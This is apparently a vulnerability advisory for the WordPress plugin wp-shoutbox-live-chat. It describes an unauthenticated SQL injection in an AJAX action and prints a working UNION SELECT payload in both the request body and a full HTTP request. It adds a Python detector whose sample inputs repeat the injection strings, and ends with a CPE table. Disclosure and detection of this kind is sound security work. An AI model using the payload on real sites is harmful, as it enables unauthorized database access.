The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Submit a message in the chatbox and intercept the request, using Burp Suite for example. Edit the request body to read:

```
action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
```

Send the request; it will succeed and also list previous messages.

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Shoutbox_alias=Guest_209
Connection: close

action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
```
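A defender-side check for the request shape above, as an added example that is not part of the advisory or the plugin's code: it flags calls to the `shoutbox-ajax-update-messages` action whose `last_timestamp` is not a plain integer. The integer-only rule, the function names and the sample bodies are assumptions constructed for illustration.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

ACTION = "shoutbox-ajax-update-messages"  # AJAX action named in the advisory
PARAM = "last_timestamp"                  # parameter that carries the SQL in the PoC
# Assumption: a legitimate client sends a plain integer timestamp.
INTEGER = re.compile(r"[0-9]{1,20}")


def check_body(body: str) -> Optional[str]:
    """Return a reason if a form-encoded body is a suspicious call to ACTION, else None."""
    fields = parse_qs(body, keep_blank_values=True)  # URL-decodes; '+' becomes a space
    if ACTION not in fields.get("action", []):
        return None  # other admin-ajax.php actions are out of scope
    values = fields.get(PARAM, [])
    if len(values) > 1:
        return "repeated last_timestamp"  # ambiguous which copy reaches the query
    for value in values:
        if not INTEGER.fullmatch(value):
            return "non-integer last_timestamp: %r" % value[:40]
    return None


def scan(bodies: List[str]) -> List[Tuple[int, str]]:
    """Return (index, reason) for every flagged body."""
    hits = []
    for i, body in enumerate(bodies):
        reason = check_body(body)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample POST bodies for /wp-admin/admin-ajax.php (not captured traffic).
SAMPLES = [
    "action=shoutbox-ajax-update-messages&last_timestamp=1650000000&rooms%5B%5D=default",
    "action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL--+&rooms%5B%5D=default",
    "action=shoutbox-ajax-update-messages&last_timestamp=0%29%20UNION%20ALL%20SELECT%20NULL",
    "action=shoutbox-ajax-update-messages&last_timestamp=5&last_timestamp=6",
    "action=heartbeat&last_timestamp=abc",
]

if __name__ == "__main__":
    for index, reason in scan(SAMPLES):
        print(index, reason)
```

Because the body is URL-decoded before the check, percent-encoded and `+`-encoded variants of the same value are flagged alike.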
CPE

Name | Operator | Version
---|---|---
wp-shoutbox-live-chat | eq | *